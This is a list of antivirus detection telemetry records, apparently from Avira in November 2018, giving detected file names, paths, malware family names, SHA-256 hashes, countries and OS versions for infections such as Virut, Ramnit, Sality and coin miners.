  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-073035-a44784aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bdc467dd\\AVSCAN-20181104-072210-60C3934D\\AVSCAN-20181104-073035-A44784AA', filesize=1536000, name='TR/Spy.Gen.#M1.#R1'), hash='3cf0cb1f81677f86e375511607ef061fe80b75236cde9e47ace9b27ca655e5a3', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:30:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0.exe', filepath='G:\\العـــاب11\\Roads Of Fantasy\\0.exe', filesize=1792000, name='W32/Virut.Gen.#M1.#R1'), hash='19870d3ff8c7f57e9ab5938d7bb0dd14e43a4f24a6463702cb9a7a856b880478', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T14:40:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c8b40acb9e735aa4877fe1c9bdadadb1881d773d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c8b40acb9e735aa4877fe1c9bdadadb1881d773d', filesize=192000, name='TR/Crypt.ASPM.Gen.#M300.#R4504'), hash='ca9f504d95b5ba4b4aedff5612bfdbf4bbb9413be45bbf8e425eaedcfeba9ebd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp3.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp3.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='5e4d448f384d475a4fd6b5b24881132ba5536235593918181a53cf1fd5910ec0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140319-f794172f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140319-F794172F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140321-f7ded85c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140321-F7DED85C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9b5b52bfff96e7b21772f8e94be21b1bde8c8020', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9b5b52bfff96e7b21772f8e94be21b1bde8c8020', filesize=896000, name='HEUR/AGEN.1003107.#M1.#R1'), hash='8864e86b889bee27a3f82473897562dbad35b5bf358c93047bdcc407e6f9a896', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:47:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d4bf', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d4bf', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140221-ed726bf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140221-ED726BF3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AEF866061C94BC3565C69964D30477942D9391FFB5392EAE79D8E04067BA0772', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aef866061c94bc3565c69964d30477942d9391ffb5392eae79d8e04067ba0772', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:41:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215957-df6a62f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215957-DF6A62F1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline='rtp', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1630208, timestamp='2018-11-04T17:50:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='E:\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcd73457116984953123e8b52cafeed9590b7abee1e72e4e9bad0a6d601c0e66', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m16O5rkNlkayFv9Z.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-193843-40974503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db339182\\AVSCAN-20181102-193753-347A19DE\\AVSCAN-20181102-193843-40974503', filesize=720000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='d1bb3e7ceb07e76ada5df2f71877a20bb07cd4df6b92f2bf47d84415aded94a1', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124354-7e3dcf0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357e84c4\\AVSCAN-20181102-113907-1504C019\\AVSCAN-20181102-124354-7E3DCF0E', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150454-518a3dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1d620a3\\AVSCAN-20181102-150440-4F3F44E0\\AVSCAN-20181102-150454-518A3DD3', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='b8d6daa9725ba3a395dbee1f87bf77d59b4822231c4f18a7dd06cf003939f9ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\733E354C150B4149737AE67AFD29DC8E971759219779881F1F0375C6118FB5B9', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175430-dbb2d4c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175430-DBB2D4C5', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:51:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-031637-057abfaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-031637-057ABFAA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='folder settings.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku kid\\Folder Settings\\Folder Settings.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='af7c388430851abc1301d292822555af10a55bd51dcb640ef2841d67e170b264', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134416-1566df10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-133815-EB71C4B2\\AVSCAN-20181102-134416-1566DF10', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gkbdrv.dll', filepath='C:\\Program Files\\ISMV5\\Binary\\Gkbdrv.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='7ed0739ca22e38244f5ece61a68fa573b90d0c89ae9ab8c72f0f44e7283e2440', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150126-7701962a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d7ee450\\AVSCAN-20181102-150020-68824B89\\AVSCAN-20181102-150126-7701962A', filesize=3520000, name='HEUR/AGEN.1004753.#M1.#R1'), hash='76d78fd29cb242c3013c375f10d7debda6f2294bec9dddbef02796360c8bd36b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='e:\\new folder\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150104-66538f9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35a45c3c\\AVSCAN-20181102-150048-63AA2A42\\AVSCAN-20181102-150104-66538F9A', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9E4E80B760D990D08C455A290A87FBE4D014A3E58547F1300B702324232FD21A', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devicedisplayobjectprovider.exe', filepath='d:\\windows\\system32\\DeviceDisplayObjectProvider.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='79c5d57160cebbfa767c17175fa978d886711f0993e303223013b3d070d737b8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ieudinit.exe', filepath='l:\\09c18b0711c00e2c8e01\\ieudinit.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='e9e6a415cdbfb9f7895c176c7055ff14fbdc841a5ac2e54c41219b0d66863d0b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T12:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crashreporter.exe', filepath='\\\\?\\C:\\ProgramData\\BlueStacksGameManager\\xulrunner-sdk\\crashreporter.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='dc9cb5b65aab576b90a51065f7ded2256d6fc2c6ff525c10d8d416faa0b87da9', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b5d866de4399d7baaeb8333938bc092f041b5659200f75d3071680ca3c9c11ee', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='8f7f27476ea1e5821a30c00a349d26bf38ff5d65cfbaa1cf62eb2af0b5e34ec9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Toshiba\\Power Saver\\TPwrMain.exe', parentsize=542640, timestamp='2018-11-02T09:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1a7ca978edb4806c4fbbff56c81610e5', filepath='e:\\sample\\20181102_sample\\1A7CA978EDB4806C4FBBFF56C81610E5', filesize=512000, name='HEUR/AGEN.1007129.#M1.#R1'), hash='9eb5344f51f1694eabd602a08deb0899ff187d8319ffeb6807f194d8313cf206', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:31:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202649-0d918e75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06577610\\AVSCAN-20181102-202634-0B3A9384\\AVSCAN-20181102-202649-0D918E75', filesize=4124000, name='PUA/OpenCandy.#M1.#R1'), hash='f2cd5bc3286bf38e9c0a3ab2992b8bb68b44a06e3f4d28bd985ada88a20d467a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:56:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flex.exe', filepath='F:\\output\\flex\\flex.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='muros en ménsula de hormigón armado.exe', filepath='C:\\CYPE Ingenieros\\Versión 2018\\programas\\Muros en ménsula de hormigón armado.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='d3c02d667cee7563884a9a1d4fbac24805be2ac1cee781fed65729032c92cc16', metadata=Row(cmdline='\\\\\\/apps \\\\\\/fast \\\\\\/ext \\\\\\"exe,sys\\\\\\" \\\\\\/output \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_ADMIN.xml\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\"', country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-02T10:28:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.vir', filepath='C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\McAfee\\AVSolution\\mcshield.exe', parentsize=1466168, timestamp='2018-11-02T19:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:45:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5tclient.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1cf51\\6.0.5.7\\B5TClient.exe', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\mfevtps.exe', parentsize=None, timestamp='2018-11-02T19:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ac8badc6ddd47cbb50f0f3aade120d997915efd7762f950c33d8f7f9a2fb2a76.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\AC8BADC6DDD47CBB50F0F3AADE120D997915EFD7762F950C33D8F7F9A2FB2A76.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ac8badc6ddd47cbb50f0f3aade120d997915efd7762f950c33d8f7f9a2fb2a76', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:46:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-134945-5fb0df65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134945-5FB0DF65', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl14c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl14C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
